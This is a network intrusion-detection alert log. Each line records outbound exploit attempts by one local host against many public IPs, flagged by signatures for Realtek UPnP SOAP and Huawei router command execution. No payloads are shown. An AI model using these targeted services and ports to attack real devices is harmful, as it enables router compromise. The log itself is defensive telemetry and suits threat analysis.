                                                07/20/24-23:05:58.727364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5648452869192.168.2.1424.248.92.177
                                                07/20/24-23:05:45.383849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664237215192.168.2.1472.84.218.103
                                                07/20/24-23:05:59.315621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23772252869192.168.2.14223.25.114.136
                                                07/20/24-23:06:01.695131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3290052869192.168.2.14212.103.129.230
                                                07/20/24-23:05:36.349447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614987452869192.168.2.1417.150.249.106
                                                07/20/24-23:05:40.486123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4635052869192.168.2.1418.89.154.147
                                                07/20/24-23:05:56.880010TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614618052869192.168.2.14128.70.217.129
                                                07/20/24-23:05:56.771185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615197452869192.168.2.14105.54.61.6
                                                07/20/24-23:05:56.395498TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613794652869192.168.2.14162.5.20.207
                                                07/20/24-23:05:58.758912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532852869192.168.2.1447.169.160.149
                                                07/20/24-23:06:40.959334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614553452869192.168.2.14209.181.227.2
                                                07/20/24-23:05:56.249595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134237215192.168.2.1441.66.251.32
                                                07/20/24-23:06:05.520793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25636852869192.168.2.14180.7.73.104
                                                07/20/24-23:05:37.476168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.14103.77.206.92
                                                07/20/24-23:06:14.957724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4899652869192.168.2.14196.158.220.11
                                                07/20/24-23:05:47.556659TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5533652869192.168.2.14149.122.202.24
                                                07/20/24-23:06:02.182231TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24420252869192.168.2.14136.117.105.142
                                                07/20/24-23:06:13.525153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25354852869192.168.2.14153.7.133.0
                                                07/20/24-23:05:42.134564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538437215192.168.2.14157.95.64.51
                                                07/20/24-23:05:56.066947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738637215192.168.2.1441.165.47.68
                                                07/20/24-23:05:52.531088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26059852869192.168.2.14170.66.204.146
                                                07/20/24-23:05:57.062143TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23876652869192.168.2.14162.5.20.207
                                                07/20/24-23:07:28.154823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4858252869192.168.2.14122.206.97.7
                                                07/20/24-23:06:01.121675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25475252869192.168.2.1440.178.115.144
                                                07/20/24-23:06:16.974761TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4239052869192.168.2.14118.110.83.106
                                                07/20/24-23:05:33.857158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844637215192.168.2.1441.122.250.164
                                                07/20/24-23:06:24.584748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673452869192.168.2.1490.91.198.115
                                                07/20/24-23:05:57.334876TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23340652869192.168.2.1443.249.97.34
                                                07/20/24-23:05:58.195412TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613858052869192.168.2.14123.114.225.162
                                                07/20/24-23:05:50.600216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728237215192.168.2.1431.124.60.137
                                                07/20/24-23:05:58.247483TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5070652869192.168.2.14108.229.127.235
                                                07/20/24-23:05:59.127021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3877052869192.168.2.1439.213.19.113
                                                07/20/24-23:05:48.767395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598037215192.168.2.14157.38.140.115
                                                07/20/24-23:06:55.981552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3348052869192.168.2.14115.14.197.229
                                                07/20/24-23:06:00.018611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3296452869192.168.2.14152.108.253.32
                                                07/20/24-23:06:27.747099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942052869192.168.2.14117.116.89.124
                                                07/20/24-23:06:38.250934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3721452869192.168.2.1483.6.1.240
                                                07/20/24-23:06:00.954677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613618052869192.168.2.14173.194.24.204
                                                07/20/24-23:05:57.123864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24308652869192.168.2.14151.37.89.93
                                                07/20/24-23:05:57.791970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3508452869192.168.2.1464.247.1.200
                                                07/20/24-23:05:36.598734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992837215192.168.2.1441.50.50.208
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317437215192.168.2.1441.112.127.7
                                                07/20/24-23:05:40.486123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318652869192.168.2.1471.187.255.160
                                                07/20/24-23:05:58.709518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615554052869192.168.2.14167.41.255.218
                                                07/20/24-23:05:45.614327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897052869192.168.2.1486.71.169.225
                                                07/20/24-23:06:00.055828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616079452869192.168.2.14130.216.114.2
                                                07/20/24-23:06:00.055828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4871652869192.168.2.1450.186.160.203
                                                07/20/24-23:05:59.823104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3286452869192.168.2.14150.6.47.69
                                                07/20/24-23:05:34.648426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345637215192.168.2.14197.167.43.41
                                                07/20/24-23:05:37.524280TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25376652869192.168.2.14168.85.33.243
                                                07/20/24-23:05:38.653067TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615280252869192.168.2.1487.103.117.210
                                                07/20/24-23:05:52.546680TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23409452869192.168.2.1498.8.249.105
                                                07/20/24-23:05:52.551649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4336652869192.168.2.14175.68.43.201
                                                07/20/24-23:06:00.844262TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3322452869192.168.2.14198.167.28.174
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185837215192.168.2.1441.247.46.12
                                                07/20/24-23:05:59.449873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4826452869192.168.2.14122.206.97.7
                                                07/20/24-23:05:57.029235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23886652869192.168.2.14207.111.101.15
                                                07/20/24-23:06:03.387430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762837215192.168.2.14197.66.136.184
                                                07/20/24-23:05:52.444444TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744252869192.168.2.14212.82.101.165
                                                07/20/24-23:06:03.429850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615288052869192.168.2.1480.185.192.112
                                                07/20/24-23:05:52.493434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24503452869192.168.2.14222.41.152.79
                                                07/20/24-23:06:09.485916TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23894452869192.168.2.14184.148.131.220
                                                07/20/24-23:06:12.946390TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23855652869192.168.2.14197.21.16.30
                                                07/20/24-23:05:57.983224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4227852869192.168.2.14107.117.156.40
                                                07/20/24-23:05:35.447609TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615397252869192.168.2.14183.59.191.208
                                                07/20/24-23:05:48.278742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364652869192.168.2.1413.6.44.150
                                                07/20/24-23:06:01.236888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3996452869192.168.2.1457.81.241.118
                                                07/20/24-23:05:47.758558TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615822052869192.168.2.14172.124.74.59
                                                07/20/24-23:05:46.351281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616010652869192.168.2.1466.83.14.44
                                                07/20/24-23:05:59.119988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3331252869192.168.2.14204.159.132.238
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573237215192.168.2.14157.123.195.63
                                                07/20/24-23:05:56.632782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6002252869192.168.2.14146.82.123.202
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063237215192.168.2.14157.224.76.86
                                                07/20/24-23:06:23.323671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6079252869192.168.2.14173.175.21.134
                                                07/20/24-23:05:57.470552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615296452869192.168.2.1473.169.3.41
                                                07/20/24-23:06:01.884914TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613472652869192.168.2.1475.122.142.231
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268437215192.168.2.14157.110.79.95
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987437215192.168.2.14141.53.240.130
                                                07/20/24-23:06:08.171917TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613675252869192.168.2.14107.150.186.44
                                                07/20/24-23:06:14.572816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615341452869192.168.2.142.26.84.136
                                                07/20/24-23:05:38.034462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5047052869192.168.2.1492.177.97.112
                                                07/20/24-23:06:44.280799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5747452869192.168.2.14163.142.81.29
                                                07/20/24-23:05:57.027141TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24053252869192.168.2.14216.188.116.154
                                                07/20/24-23:06:01.208471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5939652869192.168.2.14223.141.195.26
                                                07/20/24-23:06:12.532322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3390452869192.168.2.1494.22.181.218
                                                07/20/24-23:06:17.536919TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5885852869192.168.2.14125.137.244.94
                                                07/20/24-23:05:52.539655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503052869192.168.2.1437.61.131.138
                                                07/20/24-23:06:01.795331TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614575452869192.168.2.14134.166.44.252
                                                07/20/24-23:06:17.529212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615350652869192.168.2.1480.157.57.98
                                                07/20/24-23:06:08.345878TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616077452869192.168.2.14199.65.149.176
                                                07/20/24-23:05:33.863826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760437215192.168.2.14204.65.167.10
                                                07/20/24-23:05:35.714639TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615628052869192.168.2.14218.175.31.238
                                                07/20/24-23:05:33.862992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285037215192.168.2.14157.183.228.205
                                                07/20/24-23:06:13.720163TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614435052869192.168.2.14219.47.45.43
                                                07/20/24-23:05:58.954116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4621652869192.168.2.1447.88.146.78
                                                07/20/24-23:06:06.906932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5135052869192.168.2.144.205.10.72
                                                07/20/24-23:05:56.219051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131237215192.168.2.14123.217.142.78
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812037215192.168.2.1470.253.211.133
                                                07/20/24-23:05:36.324397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853437215192.168.2.14157.118.173.130
                                                07/20/24-23:05:57.158457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4915852869192.168.2.1490.121.47.125
                                                07/20/24-23:05:58.549030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24828452869192.168.2.14164.70.124.204
                                                07/20/24-23:06:38.067768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5076452869192.168.2.14159.56.50.124
                                                07/20/24-23:06:23.241818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613816852869192.168.2.1438.236.106.3
                                                07/20/24-23:05:45.079907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4580252869192.168.2.14117.27.246.191
                                                07/20/24-23:05:35.857672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613967252869192.168.2.14111.8.128.237
                                                07/20/24-23:06:08.130839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4455652869192.168.2.14159.132.96.211
                                                07/20/24-23:06:01.160489TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26071452869192.168.2.14149.27.20.44
                                                07/20/24-23:06:20.550859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614360452869192.168.2.14129.36.77.36
                                                07/20/24-23:05:37.493635TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24644252869192.168.2.14120.181.185.117
                                                07/20/24-23:05:59.057513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3662852869192.168.2.1489.202.192.181
                                                07/20/24-23:05:57.922651TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3983052869192.168.2.14194.151.47.138
                                                07/20/24-23:06:08.320378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4178852869192.168.2.14201.181.217.132
                                                07/20/24-23:05:42.135703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941837215192.168.2.14112.119.36.80
                                                07/20/24-23:06:00.164569TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613992052869192.168.2.14103.103.44.62
                                                07/20/24-23:06:10.507185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4802852869192.168.2.1472.69.142.196
                                                07/20/24-23:05:59.069869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5572452869192.168.2.1423.176.211.236
                                                07/20/24-23:05:58.776696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614741852869192.168.2.14139.9.84.177
                                                07/20/24-23:05:40.353037TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23508052869192.168.2.14102.139.81.245
                                                07/20/24-23:06:12.589035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613503252869192.168.2.14216.31.102.228
                                                07/20/24-23:05:48.237594TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3503452869192.168.2.14179.206.85.237
                                                07/20/24-23:05:38.200523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4301052869192.168.2.1459.44.23.42
                                                07/20/24-23:05:57.437168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5582652869192.168.2.144.91.9.190
                                                07/20/24-23:07:19.646919TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615555852869192.168.2.14152.17.67.73
                                                07/20/24-23:05:42.233806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023637215192.168.2.14175.163.152.29
                                                07/20/24-23:06:02.953099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613787452869192.168.2.14189.235.177.109
                                                07/20/24-23:06:20.646576TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24327052869192.168.2.1423.188.123.27
                                                07/20/24-23:05:42.134564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157037215192.168.2.1441.161.227.92
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561437215192.168.2.1441.102.98.6
                                                07/20/24-23:05:58.384426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4135452869192.168.2.14195.118.211.22
                                                07/20/24-23:05:39.747656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215837215192.168.2.1441.39.134.25
                                                07/20/24-23:05:57.615698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3462252869192.168.2.1485.8.43.114
                                                07/20/24-23:05:57.874102TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4251852869192.168.2.14103.66.18.174
                                                07/20/24-23:06:16.383377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24925652869192.168.2.14196.158.220.11
                                                07/20/24-23:05:36.327720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703637215192.168.2.14157.120.132.160
                                                07/20/24-23:05:40.420492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614708052869192.168.2.144.202.29.142
                                                07/20/24-23:05:45.253781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615155852869192.168.2.14109.136.114.158
                                                07/20/24-23:05:52.545166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4294452869192.168.2.14192.36.100.230
                                                07/20/24-23:05:56.124566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742037215192.168.2.14197.30.238.5
                                                07/20/24-23:05:36.510827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519237215192.168.2.1441.14.10.85
                                                07/20/24-23:06:48.772924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777852869192.168.2.14130.122.247.240
                                                07/20/24-23:05:35.748136TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614269252869192.168.2.1441.32.9.125
                                                07/20/24-23:05:59.239089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25055052869192.168.2.14151.20.36.90
                                                07/20/24-23:06:16.903590TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25923852869192.168.2.14142.226.102.135
                                                07/20/24-23:05:47.711117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3845052869192.168.2.1431.227.142.212
                                                07/20/24-23:05:59.454601TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3519452869192.168.2.14221.158.4.113
                                                07/20/24-23:06:08.034671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5732252869192.168.2.148.163.140.146
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829437215192.168.2.1441.38.212.183
                                                07/20/24-23:06:01.972621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23292652869192.168.2.14118.206.217.195
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429452869192.168.2.14120.75.230.210
                                                07/20/24-23:05:45.439167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488637215192.168.2.1494.111.19.141
                                                07/20/24-23:05:47.129772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081437215192.168.2.14157.165.95.219
                                                07/20/24-23:06:04.023969TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613409052869192.168.2.14107.85.16.135
                                                07/20/24-23:05:57.947146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616090252869192.168.2.14143.208.19.25
                                                07/20/24-23:06:13.800662TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614147452869192.168.2.14203.100.96.66
                                                07/20/24-23:05:58.374852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5853852869192.168.2.1499.133.17.148
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653637215192.168.2.1441.23.225.224
                                                07/20/24-23:05:38.525782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614337852869192.168.2.1453.127.213.152
                                                07/20/24-23:05:57.194696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248852869192.168.2.14136.6.40.211
                                                07/20/24-23:06:29.669261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614174652869192.168.2.14154.174.220.159
                                                07/20/24-23:06:18.910196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5968852869192.168.2.14178.70.56.53
                                                07/20/24-23:05:39.919214TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613303052869192.168.2.14172.234.119.46
                                                07/20/24-23:05:59.166678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3586852869192.168.2.14115.195.128.65
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557637215192.168.2.14157.178.61.166
                                                07/20/24-23:05:57.904970TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24103052869192.168.2.14191.73.229.109
                                                07/20/24-23:06:12.589035TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613325652869192.168.2.1459.78.96.71
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299037215192.168.2.14197.156.215.136
                                                07/20/24-23:05:57.164212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614865452869192.168.2.1460.41.178.30
                                                07/20/24-23:06:02.171459TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4350452869192.168.2.14136.117.105.142
                                                07/20/24-23:06:02.122085TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615318852869192.168.2.14115.181.71.144
                                                07/20/24-23:06:15.141369TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24140452869192.168.2.14192.15.83.19
                                                07/20/24-23:05:40.359038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3397052869192.168.2.14168.96.116.176
                                                07/20/24-23:05:42.237871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994837215192.168.2.14157.172.203.166
                                                07/20/24-23:05:57.653975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614625252869192.168.2.14210.208.204.245
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082037215192.168.2.1441.43.107.114
                                                07/20/24-23:05:57.571972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25435052869192.168.2.14161.171.80.80
                                                07/20/24-23:05:57.342606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25279052869192.168.2.14169.95.16.220
                                                07/20/24-23:05:37.480940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26086652869192.168.2.14207.229.195.229
